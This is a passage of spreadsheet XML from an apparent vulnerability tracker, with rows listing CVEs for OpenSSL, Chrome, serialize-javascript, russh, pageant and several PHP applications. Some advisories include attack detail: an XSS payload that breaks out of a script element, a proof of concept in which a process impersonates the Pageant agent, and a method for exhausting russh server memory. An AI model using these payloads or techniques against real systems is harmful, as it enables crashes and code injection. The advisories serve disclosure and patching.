        <v>4.3</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95361</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35191</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The OpenSSL QUIC server, when configured to not preform address
validation, can be forced to count incoming packets multiple times in its
unvalidated credit computation, leading to a violation of the RFC 9000
unvalidated connection amplification limit of 3 times the amount of data
received.
Impact summary: A remote attacker able to spoof packets to a server using the
OpenSSL QUIC implementation might use the server for an amplification of
a DDoS attack.
CWE: CWE-440: Expected Behavior Violation 
Description: OpenSSL's QUIC stack, when operating as a server, enforces client
address validation (RFC 9000, Section 8), to confirm the peer address is not
used for a traffic amplification attack.  If this feature is disabled on the
server, the QUIC stack limits the amount of server data that can be sent to 3
times the amount of data received from the peer address, until such time as the
TLS handshake is completed.
The OpenSSL QUIC server, when operating in non-validation mode, adds the
length of the whole datagram received to the unvalidated credit limit when
processing each QUIC packet in the datagram. A remote peer may,
after establishing a connection with an initial client hello frame, send a
subsequent datagram containing multiple QUIC packets, leading the server to
account the entire datagram length for each packet in the datagram, resulting
in the server believing that the peer has sent more data than it actually has,
thereby violating the 3x amplification limit mandated by the RFC.
FIPS impact: no
As the QUIC stack lives outside the FIPS module boundary, no FIPS modules
are affected by this CVE.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35191</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97711</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr">
        <is>
          <t>npm:serialize-javascript</t>
        </is>
      </c>
      <c r="M373" s="5" t="inlineStr">
        <is>
          <t>7.1.2</t>
        </is>
      </c>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr"/>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>### Impact
`serialize-javascript` escapes its output so it is safe to embed inside a
`&lt;script&gt;` element. In 7.1.1 that guarantee does not hold for **function
values**: a crafted function body can carry a literal, unescaped `&lt;/script&gt;`
into the output, terminating the script element early so the remainder is
parsed as HTML.
`SCRIPT_CLOSE_REGEXP` used `&lt;\/script[^&gt;]*&gt;` as its first alternative. The
character class excludes only `&gt;`, so a single match could run from one
`&lt;/script` all the way to the next `&gt;` anywhere in the source — swallowing a
second, complete `&lt;/script&gt;` along the way. Only one replacement is emitted
per match, and the plain-code branch neutralizes just the leading `&lt;`
(`'&lt; ' + match.slice(1)`), so the swallowed tag was re-emitted verbatim.
Reaching that shape requires `&lt;/script` in code position, which is legal
JavaScript: `x&lt;/script=+/` parses as `x &lt; /script=+/`, a comparison against a
regex literal.
```js
const serialize = require('serialize-javascript');
const src = "function f(x){ return x&lt;/script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }";
const out = serialize({ h: new Function('return ' + src)() });
// {"h":function f(x){ return x&lt; /script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }}
```
Embedded as the README documents (`&lt;script&gt;window.S = &lt;%= serialize(state) %&gt;&lt;/script&gt;`)
and parsed by Chromium, the script element ends at the injected tag and the
`&lt;img&gt;` becomes a live DOM node with its `onerror` handler executing in the
page origin.
Only the function path is affected. The same payload passed as **data** is
escaped correctly, and `options.isJSON` / non-function values are unaffected.
### Patches
Fixed in **7.1.2**. The wildcard now excludes `&lt;` as well as `&gt;`
(`[^&lt;&gt;]*`), so a match can never reach past a second `&lt;`. Every `&lt;/script`
in the source therefore either begins its own match or is followed by a
character the HTML tokenizer does not accept as ending a tag name — it ends
the tag name only on TAB, LF, FF, CR, SPACE, `/` or `&gt;`, and emits anything
else as text.
### Workarounds
Upgrade to **7.1.2**. If you cannot upgrade, 7.1.0 and earlier are
unaffected, or avoid serializing functions whose source text is
attacker-influenced.
### Regression note
This is a regression specific to 7.1.1, not a long-standing issue. 7.1.0 and
earlier applied the same wildcard but escaped the **entire** match, so no tag
survived. Downstream scanners defaulting to a `&gt;= 7.1.0` range would be
overly broad.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97711</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102842</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. Affected by this issue is the function app_user_login_model.php::cekUserLogin of the file application/models/app_user_login_model.php of the component KCFinder File Manager. Such manipulation of the argument ADMIN_RS_KCFINDER leads to unrestricted upload. It is possible to launch the attack remotely. The exploit is publicly available and might be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102842</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102847</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. The affected element is the function kirim of the file application/modules/web/controllers/buku_tamu.php of the component Guest Book. This manipulation of the argument nama/email/pesan causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102847</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.4 → 2.1)</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102877</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>Fider before 0.38.0 contains a server-side request forgery vulnerability due to a time-of-check time-of-use gap in URL validation for webhooks and custom OAuth provider endpoints. Administrators controlling DNS can perform DNS rebinding attacks to make the Fider server send requests to internal services or cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102877</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102771</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-791</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Naichen ThinkCMF up to 8.0.7. Affected by this issue is the function MailController::templatePut of the file cmf-api/src/admin/controller/MailController.php of the component Email Template. The manipulation leads to improper neutralization of special elements used in a template engine. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102771</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (2.7 → 2.0)</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102844</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. This vulnerability affects the function detail of the file application/modules/admin/controllers/laporan_data_pasien.php. Executing a manipulation of the argument id_param can lead to authorization bypass. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102844</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102820</t>
        </is>
      </c>
      <c r="D379" s="5" t="inlineStr"/>
      <c r="E379" s="5" t="inlineStr"/>
      <c r="F379" s="5" t="inlineStr"/>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr">
        <is>
          <t>rust:pageant</t>
        </is>
      </c>
      <c r="M379" s="5" t="inlineStr">
        <is>
          <t>0.2.3</t>
        </is>
      </c>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr"/>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-789</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>## Summary
`MemoryMap::read` in the `pageant` crate (part of the russh workspace, used by
russh's SSH-agent client on Windows via `AgentClient::connect_pageant`) copies a
**peer-controlled** number of bytes out of an 8192-byte shared-memory view with
**no bounds check** — unlike the sibling `MemoryMap::write`, which correctly
rejects oversize access with `Error::Overflow`. The byte count comes straight
from a `u32` length prefix that the responding "Pageant" process writes into the
shared mapping. A malicious local process that answers as the Pageant agent can
therefore cause:
- an **out-of-bounds read** past the 8 KiB view (access violation → process
  crash; or disclosure of adjacent process memory if the following page is
  committed)
- an allocation of up to **~4 GiB** from a single `u32` (`vec![0; n]`).
This was reproduced **end-to-end against the real, unmodified `pageant` crate**
(not a model) on `x86_64-pc-windows-gnu` under Wine; see "Proof of concept".
## Impact
- **Availability / DoS (reliable).** `MemoryMap::read(size)` walks off the end of
  the 8192-byte view and faults on the next, unmapped page — an
  `EXCEPTION_ACCESS_VIOLATION` that crashes the russh SSH client. Independently,
  a `size` near `u32::MAX` drives a ~4 GiB `vec![0; n]` before any copy.
- **Confidentiality (conditional).** If memory immediately after the mapped view
  happens to be committed, `read` returns those adjacent bytes to russh as the
  "agent response", which russh then parses as agent identities/signatures. This
  arm depends on process memory layout, so it is opportunistic; the crash/alloc
  is the deterministic outcome.
- **Trust boundary.** russh locates the agent with
  `FindWindowW("Pageant", "Pageant")` and passes the shared-mapping name inside
  the `WM_COPYDATA` `COPYDATASTRUCT`. **Any** local process can register a window
  of class + title `"Pageant"`, receive that name, open the same mapping, and
  write a hostile `size`. So an unprivileged local process impersonating Pageant
  can attack every russh-based SSH client that uses the Pageant agent.
## Affected component
- `pageant/src/wmmessage.rs`
  - `MemoryMap::read` (`:160-171`) — no bound (contrast `MemoryMap::write`
    `:139-158`, which returns `Error::Overflow` when `pos + len &gt; length`).
  - `query_pageant_direct` (`:199-237`) — reads a 4-byte `u32` size from the
    shared mapping (`:233`) and calls `map.read(size)` (`:234`) with no check
    against `_AGENT_MAX_MSGLEN` (8192).
- Reached from russh via `AgentClient::connect_pageant` → `PageantStream` →
  `query_pageant_direct`.
Platform: **Windows only** (`cfg(windows)`), local attacker. Verified against
the `pageant` crate **v0.2.2** as shipped in russh **v0.63.1** (`d3ae702`, the
latest release). `read` has never had a bound in any revision
(`git log -p -- pageant/src/wmmessage.rs`).
## Details
```rust
fn write(&amp;mut self, data: &amp;[u8]) -&gt; Result&lt;(), Error&gt; {
    if self.pos + data.len() &gt; self.length {      // :140  BOUND PRESENT
        return Err(Error::Overflow);
    }
    ... copy_nonoverlapping(&amp;data[0], view+pos, data.len()) ...
}
fn read(&amp;mut self, n: usize) -&gt; Vec&lt;u8&gt; {         // :160  NO BOUND
    let out = vec![0; n];                         // n up to 0xFFFF_FFFF (CWE-789)
    unsafe {
        std::ptr::copy_nonoverlapping(
            self.view.Value.add(self.pos) as *const u8,   // view is length==8192
            out.as_ptr() as *mut u8,
            n,                                    // reads n bytes, may run past the view (CWE-125)
        );
    }
    self.pos += n;
    out
}
```
`query_pageant_direct` creates the mapping at `_AGENT_MAX_MSGLEN = 8192`, writes
the request, sends the `WM_COPYDATA`, then reads the response the peer wrote:
```rust
map.seek(0);
let mut buf = map.read(4);
let size = u32::from_be_bytes([buf[0],buf[1],buf[2],buf[3]]) as usize; // :233 peer-controlled
buf.extend(map.read(size));                                            // :234 unbounded
```
Nothing checks `4 + size &lt;= 8192`, so `map.read(size)` runs past the 8 KiB view.
## Proof of concept
Because the bug is Windows-only (`WM_COPYDATA` + `MapViewOfFile`), the PoC is a
Windows cross-build (`x86_64-pc-windows-gnu`) driven under **Wine**, entirely
inside a Linux container. It exercises the **real, unmodified** crate: the PoC
takes a path dependency on `pageant` and calls
`pageant::wmmessage::query_pageant_direct`, exactly what
`AgentClient::connect_pageant` uses. A second thread impersonates Pageant
(registers the window class + title `"Pageant"`) and, on `WM_COPYDATA`, opens
the shared mapping russh created and writes an attacker-chosen 4-byte
big-endian length.
`poc/run.sh` builds and runs it. Full log in `results/e2e-wine-run.log`:
```
======== LEG 1 — ATTACK: fake agent reports length 0x00080000 (512 KiB) &gt;&gt; 8192-byte view ========
[attacker] impersonating Pageant window is up (class+title "Pageant")
[victim ] calling pageant::wmmessage::query_pageant_direct() over the 8192-byte view ...
[attacker] WM_COPYDATA received; shared mapping = "PageantRequestpoc"
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
wine: Unhandled page fault on read access to 0000000002092000 at address 00000002282CFDC4 ...
WINE-EXIT=5
======== LEG 2 — CONTROL: fake agent reports length 0x00000010 (16 B), in-bounds ========
[victim ] returned 20 bytes — request+response fit inside the 8192-byte view (in-bounds control); no fault
WINE-EXIT=0
```
- **LEG 1 (attack)**: an oversized `size` makes `MemoryMap::read` read past the
  8192-byte view; Wine reports an unhandled page fault at a page-aligned address
  (`0x…2092000`) — the out-of-bounds read as an access violation (crash). Exit
  code 5 = `STATUS_ACCESS_VIOLATION`.
- **LEG 2 (control)**: an in-bounds `size` returns cleanly. Same code path; the
  only difference is whether the peer's length exceeds the view — isolating the
  missing bound.
**Fix validation.** With `patch/pageant-read-bound.patch` applied and the PoC
rebuilt against the patched crate, the identical attack input is rejected
(`results/patched-wine-run.log`):
```
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
[victim ] query_pageant_direct error: Overflow
WINE-EXIT=0
```
No fault; the read is refused at the bound, exactly as `write` already refuses
oversize writes. (A pure-logic Linux model of the same control flow is also
included as `poc/pageant_read_oob_demo.rs` / `results/logic-demo-run.log`.)
## Remediation
Mirror `write`'s guard in `read` and validate the response length before
allocating/copying. `patch/pageant-read-bound.patch`:
- `MemoryMap::read(n)` returns `Result&lt;Vec&lt;u8&gt;, Error&gt;` and returns
  `Error::Overflow` when `self.pos + n &gt; self.length`;
- `query_pageant_direct` propagates that `Result` and additionally rejects
  `size &gt; _AGENT_MAX_MSGLEN - 4` before `map.read(size)`.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102820</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102821</t>
        </is>
      </c>
      <c r="D380" s="5" t="inlineStr"/>
      <c r="E380" s="5" t="inlineStr"/>
      <c r="F380" s="5" t="inlineStr"/>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="inlineStr"/>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M380" s="5" t="inlineStr">
        <is>
          <t>0.63.2</t>
        </is>
      </c>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr"/>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>## Summary
A russh **server** can be driven to unbounded heap growth (process OOM / kill) by
a peer that speaks only standard SSH messages, in the **default configuration**.
The peer starts a key re-exchange (sends `SSH_MSG_KEXINIT`) but never sends the
follow-up `SSH_MSG_KEX_ECDH_INIT`, leaving the server's kex state machine in
`SessionKexState::InProgress` **indefinitely**. While a rekey is in progress the
server's three message-drain paths are all gated off (`if !self.kex.active()`),
but the network-read path stays active, so every `SSH_MSG_CHANNEL_OPEN` the peer
sends is processed inline and appends one reply to an **unbounded** internal
queue (`priority_receiver`, an `UnboundedReceiver`) that is not dequeued until
the rekey completes. Because the peer decides whether the rekey ever completes,
the queue — and the server's memory — grows without bound.
This is reproducible end-to-end against a real russh server over a real
encrypted transport; see "Proof of concept". A one-line negative control (same
flood, no rekey) keeps memory flat, isolating the rekey window as the sole
trigger.
## Impact
- **Availability / DoS.** Server RSS climbs at roughly 3.3 KB per
  `CHANNEL_OPEN`, driven entirely by the peer, until the process is OOM-killed.
  In the reproduction one connection pushed the server from ~4 MB to **2.57 GB**
  (and past **4.8 GB** against the stock `echoserver` example) and it was still
  climbing when the flood was stopped.
- **Reached with standard messages, no special configuration.** Any handler is
  affected, including one that rejects every channel (the reply enqueued on
  rejection is exactly what accumulates). There is no per-connection cap on
  in-flight channel opens or on the queue, and the queue's sender has no
  backpressure.
- The peer keeps the connection alive simply by continuing to send, so the
  inactivity timer never fires.
## Affected component
- `russh/src/server/session.rs` — `Session::run` `tokio::select!` loop. The
  network-read arm is ungated; the three drain paths are gated on
  `!self.kex.active()`.
- `russh/src/server/mod.rs` — `reply()` routes a non-kex message received during
  a rekey straight to `server_read_encrypted` (inline processing).
- `russh/src/lib_inner.rs` — `ChannelOpenHandleInner`'s `accept`/`reject`/`Drop`
  all `send` a reply on an `UnboundedSender`.
Verified on **v0.63.1** (commit `d3ae702`), which is the latest release. The
gating logic predates it.
## Details
`Session::run` (`russh/src/server/session.rs:631`) drives a `tokio::select!`
(`:713`). Three of its message-drain sites are gated on `!self.kex.active()`:
- the pre-`select!` batch drain of `priority_receiver`/`receiver`
  (`session.rs:680`),
- the `priority_receiver.recv()` arm (`session.rs:762`),
- the `receiver.recv()` arm (`session.rs:770`, which also holds the only other
  `priority_receiver` drain at `:777`).
The fourth arm, `r = &amp;mut reading` (`session.rs:714`), is **ungated**: it reads
and processes one incoming packet every loop iteration regardless of rekey
state, calling `reply()` (`server/mod.rs:1128`).
During a **rekey**, `session.common.encrypted.is_some()`, so the strict-kex
message-ordering guard (`server/mod.rs:1143`, which is additionally gated on
`encrypted.is_none()`) does **not** apply. A non-kex message therefore falls
through `reply()` to `session.server_read_encrypted(handler, pkt)`
